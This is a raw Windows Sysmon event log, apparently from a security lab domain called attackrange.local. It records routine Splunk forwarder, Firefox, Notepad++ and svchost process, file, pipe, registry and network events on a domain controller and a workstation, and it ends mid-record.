07:49:54.003{466BC892-02AF-60E8-0C00-00000000CF01}8449428C:\Windows\system32\svchost.exe{466BC892-02BC-60E8-2E00-00000000CF01}1152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001047924Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 
07:49:54.003{466BC892-02AF-60E8-0C00-00000000CF01}8449428C:\Windows\system32\svchost.exe{466BC892-02BC-60E8-2E00-00000000CF01}1152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001047923Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:49:54.003{466BC892-02AD-60E8-0500-00000000CF01}408424C:\Windows\system32\csrss.exe{466BC892-F421-60EB-1B7D-00000000CF01}9468C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x80000000000000001047922Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:49:54.003{466BC892-02BC-60E8-2A00-00000000CF01}29283252C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{466BC892-F421-60EB-1B7D-00000000CF01}9468C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program 
Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 154100x80000000000000001047921Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:49:53.997{466BC892-F421-60EB-1B7D-00000000CF01}9468C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe8.0.2Windows Print Monitor splunk ApplicationSplunk Inc.splunk-winprintmon.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{466BC892-02AD-60E8-E703-000000000000}0x3e70SystemMD5=36D3753920C5BBCA16D12DEAD7A3A904,SHA256=EA17F69FB116CFA6ADC3CE07EBBAE3FD2CB221F25E3F7A9ADF3F15DA051831E2,IMPHASH=264D4B9546D98D77D97F569F55A0B748{466BC892-02BC-60E8-2A00-00000000CF01}2928C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 23542300x80000000000000001047931Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:49:55.619{466BC892-02CE-60E8-7600-00000000CF01}3400NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=9ECE9FBEDF7720084FE7FEAAF00C0216,SHA256=153A6E4B6F85B3A32907B510FB2A810C26B32815E65028D049ECB13842125A92,IMPHASH=00000000000000000000000000000000falsetrue 
354300x8000000000000000807128Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:49:54.248{0C1E0330-0512-60E8-CA00-00000000D001}3600C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.15win-host-623.attackrange.local57233-false10.0.1.12ip-10-0-1-12.eu-central-1.compute.internal8000- 23542300x8000000000000000807127Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:49:55.256{0C1E0330-0518-60E8-D300-00000000D001}380NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=DB23C346FDDB66FD0DB58DF00E6B4D50,SHA256=0F3ACFBD8E6EB291B7F5B79C91B040B25F4CE0C75F790F60E8F83FF4D86BF741,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001047930Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:49:55.019{466BC892-02CE-60E8-7600-00000000CF01}3400NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=2F478733F0285A18219334F10E247FDC,SHA256=FFC191B3169C68EF797206E33C0F41AF166AAACD38CCF4DA9B0593453E9138E8,IMPHASH=00000000000000000000000000000000falsetrue 354300x80000000000000001047934Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:49:47.783{466BC892-02C7-60E8-6D00-00000000CF01}3524C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.14win-dc-890.attackrange.local50992-false10.0.1.12-8000- 23542300x80000000000000001047933Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:49:56.901{466BC892-02BC-60E8-2A00-00000000CF01}2928NT AUTHORITY\SYSTEMC:\Program 
Files\SplunkUniversalForwarder\bin\splunkd.exeC:\Program Files\SplunkUniversalForwarder\var\run\serverclass.xmlMD5=DD4D1D185AB4AED8A391DDEB7814ED87,SHA256=CA570F672172721E4189F1D4FCAE899B45A155271730C13B6A88FE6BC47AB312,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001047932Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:49:56.634{466BC892-02CE-60E8-7600-00000000CF01}3400NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=80394B817D91E18C3089EE97AE0BD21F,SHA256=8C64122E85959C96670D2A15B5733873E9FB387DEEE9B0646F7C861DF5758F32,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000807129Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:49:56.271{0C1E0330-0518-60E8-D300-00000000D001}380NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=A3A4E5D28A378B14D8E1B2D6315B6299,SHA256=A4C6F053A6F168A325289FA77D2ABB9C4BAFD97948402BE48A3D39AE4A893B50,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000807130Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:49:57.271{0C1E0330-0518-60E8-D300-00000000D001}380NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=96BD9F651E1F99252BF06C5595D9C061,SHA256=BC97164CBA011FA3365B9DF8007FFBE9F5352FD360EF2A71757FAF1A4CEA988B,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001047936Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:49:57.649{466BC892-02CE-60E8-7600-00000000CF01}3400NT 
AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=40C41EF692FA60C02E425EF3AC8045E8,SHA256=AE5E0698DED4E96BEBF5481145744457F4F54CD1DFA8A603DA21BCEB1AB19B42,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001047935Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:49:57.198{466BC892-35E4-60E8-4B0C-00000000CF01}7336ATTACKRANGE\bobC:\Program Files\Notepad++\notepad++.exeC:\Users\bob\AppData\Roaming\Notepad++\backup\AttackRangeSysmon.xml@2021-07-12_074929MD5=FCB0CFEB74D7EFEAD54C3F1C2E7C7FEF,SHA256=4FF533C44F74FDEA4769C00B85E7E522267A039D110178B537033963E4F91E8B,IMPHASH=00000000000000000000000000000000falsetrue 354300x80000000000000001047939Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:49:50.430{466BC892-02BC-60E8-2A00-00000000CF01}2928C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.14win-dc-890.attackrange.local50993-false10.0.1.12-8089- 23542300x80000000000000001047938Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:49:58.679{466BC892-02CE-60E8-7600-00000000CF01}3400NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=A03F42A3327D284513D5ACD103FC6224,SHA256=668020E2C80CB696FF24107A984DF7514AAC557A14B241C03F18DAD166A1B523,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000807131Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:49:58.271{0C1E0330-0518-60E8-D300-00000000D001}380NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program 
Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=370422F6E02BAC509CE34A6F05ADE402,SHA256=72F50914318A527F10553542E6B624698F665A4403D8A9F3C8F026BF6C6806D0,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001047937Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:49:58.417{466BC892-02CE-60E8-7600-00000000CF01}3400NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=0C1A6B376E2CABBBDCB147497206F948,SHA256=DEDC4A60552932CFB7478D932E389565039CA2D636DA3A6CF9F02B73AA53E23B,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001047940Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:49:59.698{466BC892-02CE-60E8-7600-00000000CF01}3400NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=990BBB1A16A53A03F1682DA23074AC26,SHA256=11384024174A5148A85BEC663E417D2405ED56F791CB108E766B549AAA20D7F9,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000807132Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:49:59.271{0C1E0330-0518-60E8-D300-00000000D001}380NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=89F04AB4163524B5020E7D6F620AF0A6,SHA256=C28A8948C454A2B6102B4B05E5C928E4194F7A3D4DE28AB557C7E3F1775322F6,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001047942Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:50:00.717{466BC892-02CE-60E8-7600-00000000CF01}3400NT AUTHORITY\SYSTEMC:\Program 
Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=867D05876C9CE43804FBC724EBCF5193,SHA256=E876C636308146788987C5F4C9C04B2B3FF2725862479059F61B290E4E77A4C8,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000807133Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:50:00.287{0C1E0330-0518-60E8-D300-00000000D001}380NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=D25712B0131E808E6D7AC6F1E494A48A,SHA256=120C568685A18DB7FB05ABE369308704C34121687701E337F3B9558DB55AB8B9,IMPHASH=00000000000000000000000000000000falsetrue 354300x80000000000000001047941Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:49:50.669{466BC892-02AF-60E8-0F00-00000000CF01}360C:\Windows\System32\svchost.exeNT AUTHORITY\NETWORK SERVICEtcpfalsefalse191.96.168.180-63651-false10.0.1.14win-dc-890.attackrange.local3389ms-wbt-server 23542300x80000000000000001047944Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:50:01.733{466BC892-02CE-60E8-7600-00000000CF01}3400NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=DCB16A69B40F919FF5C68DD39C9BD1D5,SHA256=318300E65E70E0E13ED81739DCA00F45083ECBB66EE95D38498E4EA6B79B0DE0,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000807135Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:50:01.287{0C1E0330-0518-60E8-D300-00000000D001}380NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program 
Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=C7A4239E6E2CC406620636EC56D8C7A6,SHA256=0881FFEF69009F8573761324355CD8267F3F7B24AE51ED5F2ED0228CA9A06504,IMPHASH=00000000000000000000000000000000falsetrue 13241300x80000000000000001047943Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-SetValue2021-07-12 07:50:01.248{466BC892-02AF-60E8-1000-00000000CF01}432C:\Windows\system32\svchost.exeHKLM\System\CurrentControlSet\Services\W32Time\Config\LastKnownGoodTimeQWORD (0x01d776f2-0x84c67cb0) 354300x8000000000000000807134Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:49:59.357{0C1E0330-0512-60E8-CA00-00000000D001}3600C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.15win-host-623.attackrange.local57234-false10.0.1.12ip-10-0-1-12.eu-central-1.compute.internal8000- 23542300x80000000000000001047951Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:50:02.734{466BC892-02CE-60E8-7600-00000000CF01}3400NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=3C3B8A4451773C28B09691A100BC1486,SHA256=688D320FD7DDC0F9D2D2332AB808886018FD41892272ED9B767D35651599DE15,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000807136Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:50:02.302{0C1E0330-0518-60E8-D300-00000000D001}380NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program 
Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=BB75CDC48DA08EE6E3337F84DC446299,SHA256=A37ED46CE28F0E56C9C55FA6CECBE52D33F4E046386B610B51682161DF9B4005,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001047950Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:50:02.266{466BC892-3462-60E8-100C-00000000CF01}8944ATTACKRANGE\bobC:\Program Files\Mozilla Firefox\firefox.exeC:\Users\bob\AppData\Roaming\Mozilla\Firefox\Profiles\bnjry9g4.default-release\storage\default\https+++twitter.com\idb\1046228012scyn.sqlite-shmMD5=B7C14EC6110FA820CA6B65F5AEC85911,SHA256=FD4C9FDA9CD3F9AE7C962B0DDF37232294D55580E1AA165AA06129B8549389EB,IMPHASH=00000000000000000000000000000000falsetrue 10341000x80000000000000001047949Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:50:02.218{466BC892-3462-60E8-100C-00000000CF01}89445812C:\Program Files\Mozilla Firefox\firefox.exe{466BC892-3465-60E8-160C-00000000CF01}6264C:\Program Files\Mozilla Firefox\firefox.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\Mozilla Firefox\xul.dll+3e7611|C:\Program Files\Mozilla Firefox\xul.dll+121488e|C:\Program Files\Mozilla Firefox\xul.dll+140c86d|C:\Program Files\Mozilla Firefox\xul.dll+1223271|C:\Program Files\Mozilla Firefox\xul.dll+12192da|C:\Program Files\Mozilla Firefox\xul.dll+2208260|C:\Program Files\Mozilla Firefox\xul.dll+221acda|C:\Program Files\Mozilla Firefox\xul.dll+2201919|C:\Program Files\Mozilla Firefox\xul.dll+2201645|C:\Program Files\Mozilla Firefox\xul.dll+2205190|C:\Program Files\Mozilla Firefox\xul.dll+2216ecd|C:\Program Files\Mozilla Firefox\xul.dll+22213c8|C:\Program Files\Mozilla Firefox\xul.dll+2220a14|C:\Program Files\Mozilla Firefox\xul.dll+220bbd6|C:\Program Files\Mozilla Firefox\xul.dll+40976|C:\Program Files\Mozilla Firefox\xul.dll+3f85a|C:\Program Files\Mozilla 
Firefox\xul.dll+120351f|C:\Program Files\Mozilla Firefox\xul.dll+3f65e|C:\Program Files\Mozilla Firefox\xul.dll+dabd27|C:\Program Files\Mozilla Firefox\nss3.dll+fac5a|C:\Program Files\Mozilla Firefox\nss3.dll+ee441|C:\Windows\System32\ucrtbase.dll+1fb80 10341000x80000000000000001047948Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:50:02.218{466BC892-3462-60E8-100C-00000000CF01}89445812C:\Program Files\Mozilla Firefox\firefox.exe{466BC892-3465-60E8-160C-00000000CF01}6264C:\Program Files\Mozilla Firefox\firefox.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\Mozilla Firefox\xul.dll+3e7611|C:\Program Files\Mozilla Firefox\xul.dll+121488e|C:\Program Files\Mozilla Firefox\xul.dll+140c86d|C:\Program Files\Mozilla Firefox\xul.dll+1223271|C:\Program Files\Mozilla Firefox\xul.dll+12192da|C:\Program Files\Mozilla Firefox\xul.dll+2208260|C:\Program Files\Mozilla Firefox\xul.dll+221acda|C:\Program Files\Mozilla Firefox\xul.dll+2201919|C:\Program Files\Mozilla Firefox\xul.dll+2201645|C:\Program Files\Mozilla Firefox\xul.dll+2205190|C:\Program Files\Mozilla Firefox\xul.dll+2216ecd|C:\Program Files\Mozilla Firefox\xul.dll+22213c8|C:\Program Files\Mozilla Firefox\xul.dll+2220a14|C:\Program Files\Mozilla Firefox\xul.dll+220bbd6|C:\Program Files\Mozilla Firefox\xul.dll+40976|C:\Program Files\Mozilla Firefox\xul.dll+3f85a|C:\Program Files\Mozilla Firefox\xul.dll+120351f|C:\Program Files\Mozilla Firefox\xul.dll+3f65e|C:\Program Files\Mozilla Firefox\xul.dll+dabd27|C:\Program Files\Mozilla Firefox\nss3.dll+fac5a|C:\Program Files\Mozilla Firefox\nss3.dll+ee441|C:\Windows\System32\ucrtbase.dll+1fb80 18141800x80000000000000001047947Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-ConnectPipe2021-07-12 07:50:02.218{466BC892-3462-60E8-100C-00000000CF01}8944\chrome.6264.1213.86000569C:\Program Files\Mozilla Firefox\firefox.exe 
17141700x80000000000000001047946Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-CreatePipe2021-07-12 07:50:02.218{466BC892-3465-60E8-160C-00000000CF01}6264\chrome.6264.1213.86000569C:\Program Files\Mozilla Firefox\firefox.exe 354300x80000000000000001047945Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:49:53.647{466BC892-02C7-60E8-6D00-00000000CF01}3524C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.14win-dc-890.attackrange.local50994-false10.0.1.12-8000- 23542300x80000000000000001047964Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:50:03.750{466BC892-02CE-60E8-7600-00000000CF01}3400NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=0F58C2032CFF5B1640A4077F6D33B18F,SHA256=AC095F101BB017EFB9F7A23321AB898F4DBDCBC6830A9028F641B21031EFD0AF,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000807137Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:50:03.318{0C1E0330-0518-60E8-D300-00000000D001}380NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=7EF904BA1FC444CFA3B1C582000B02B5,SHA256=7D4EC1F71C7FA0A2A9E98565FBCDB16351ADC483746E4F4E35259D00EF1DA3CB,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001047963Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:50:03.581{466BC892-3462-60E8-100C-00000000CF01}8944ATTACKRANGE\bobC:\Program Files\Mozilla 
Firefox\firefox.exeC:\Users\bob\AppData\Roaming\Mozilla\Firefox\Profiles\bnjry9g4.default-release\datareporting\glean\db\data.safe.binMD5=CF029EB0D382EA443BFFA0F91B4BB548,SHA256=E694FC40111DB195960A51C4DD790802FA0349F04E7D4B45D2D2BFA5B7FB08F2,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001047962Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:50:03.581{466BC892-3462-60E8-100C-00000000CF01}8944ATTACKRANGE\bobC:\Program Files\Mozilla Firefox\firefox.exeC:\Users\bob\AppData\Roaming\Mozilla\Firefox\Profiles\bnjry9g4.default-release\datareporting\glean\db\data.safe.binMD5=BCF44BE4CDEC30E382B0E19CFF49DD01,SHA256=7278747F83D5DCB0BB016ECFFD19C845AA00FCD81CCBD9F9D6FCCA0EDFCF1559,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001047961Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:50:03.581{466BC892-3462-60E8-100C-00000000CF01}8944ATTACKRANGE\bobC:\Program Files\Mozilla Firefox\firefox.exeC:\Users\bob\AppData\Roaming\Mozilla\Firefox\Profiles\bnjry9g4.default-release\datareporting\glean\db\data.safe.binMD5=836988B77F4245D4B293A01DAEEDE930,SHA256=6411BD8BFBF940ED08419C62A0B3BF7411B89ACA405D230B38AA7E98C8580956,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001047960Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:50:03.581{466BC892-3462-60E8-100C-00000000CF01}8944ATTACKRANGE\bobC:\Program Files\Mozilla Firefox\firefox.exeC:\Users\bob\AppData\Roaming\Mozilla\Firefox\Profiles\bnjry9g4.default-release\datareporting\glean\db\data.safe.binMD5=D87D2CA6DC738B74A5EC64779DA92028,SHA256=5FD42DB378C1A93EE9EA0DBFAD5BE46D773350C80EC6FC9337F469DD54B037E5,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001047959Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:50:03.581{466BC892-3462-60E8-100C-00000000CF01}8944ATTACKRANGE\bobC:\Program Files\Mozilla 
Firefox\firefox.exeC:\Users\bob\AppData\Roaming\Mozilla\Firefox\Profiles\bnjry9g4.default-release\datareporting\glean\db\data.safe.binMD5=7C471D6EB21BA36FD1BAC52EDF9196A8,SHA256=24F8178ADD0005F0A98C1E3849D788FC94C8C393BFA11AF3633CA93406F52ADA,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001047958Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:50:03.581{466BC892-3462-60E8-100C-00000000CF01}8944ATTACKRANGE\bobC:\Program Files\Mozilla Firefox\firefox.exeC:\Users\bob\AppData\Roaming\Mozilla\Firefox\Profiles\bnjry9g4.default-release\datareporting\glean\db\data.safe.binMD5=00D619B0C47D6325B58694F40BDD9C70,SHA256=B7891708401962F8E66B5B810AED1DD70AB81FA6724A0485621CC18D7BE736FD,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001047957Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:50:03.581{466BC892-3462-60E8-100C-00000000CF01}8944ATTACKRANGE\bobC:\Program Files\Mozilla Firefox\firefox.exeC:\Users\bob\AppData\Roaming\Mozilla\Firefox\Profiles\bnjry9g4.default-release\datareporting\glean\db\data.safe.binMD5=69D136AE18059456D7098D0EA3E4C183,SHA256=99DB653A3D376292122B1E3F784A3A710FB725F19828CBC790003B70536826B4,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001047956Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:50:03.581{466BC892-3462-60E8-100C-00000000CF01}8944ATTACKRANGE\bobC:\Program Files\Mozilla 